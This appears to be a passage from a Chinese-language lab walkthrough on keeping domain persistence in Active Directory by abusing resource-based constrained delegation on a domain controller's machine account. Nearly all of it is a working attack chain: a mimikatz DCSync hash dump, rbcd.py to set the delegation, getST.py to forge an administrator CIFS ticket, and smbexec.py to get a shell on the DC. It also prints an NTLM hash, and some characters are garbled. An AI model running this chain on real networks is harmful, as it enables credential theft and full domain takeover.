為某個(gè)服務(wù)賬戶配置 krbtgt 用戶的非約束性委派或基于資源的約束性委派。這里我的 krbtgt 的基于資源約束性委派我利用不了，所以使用的是域控的機(jī)器賬戶 dc01$ 進(jìn)行維權(quán)。

抓取所有 hash。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\administrator /csv" "exit"
?
這里很多賬號(hào)都是如下 hash，是因?yàn)樗麄兊拿艽a都是一樣的。
9099d68602a60f007c227c4fa95fada6
9099d68602a60f007c227c4fa95fada6

給機(jī)器賬戶 dc01$ 配置 machine$ 的基于資源的約束性委派

python ./rbcd.py -f comp1 -t dc01 -dc-ip 192.168.72.21 HACKER\\administrator -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6

以 administrator 請(qǐng)求 cifs/dc01.HACK.com 票據(jù)

# 以 administrator 請(qǐng)求 cifs/dc01.HACK.com 票據(jù)
python3 getST.py -dc-ip 192.168.72.21 HACK.com/machine$ -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 -spn cifs/dc01.HACK.com -impersonate administrator
?
export KRB5CCNAME=administrator@cifs_dc01.HACK.com@HACK.COM.ccache
?
python3 smbexec.py -no-pass -k dc01.HACK.com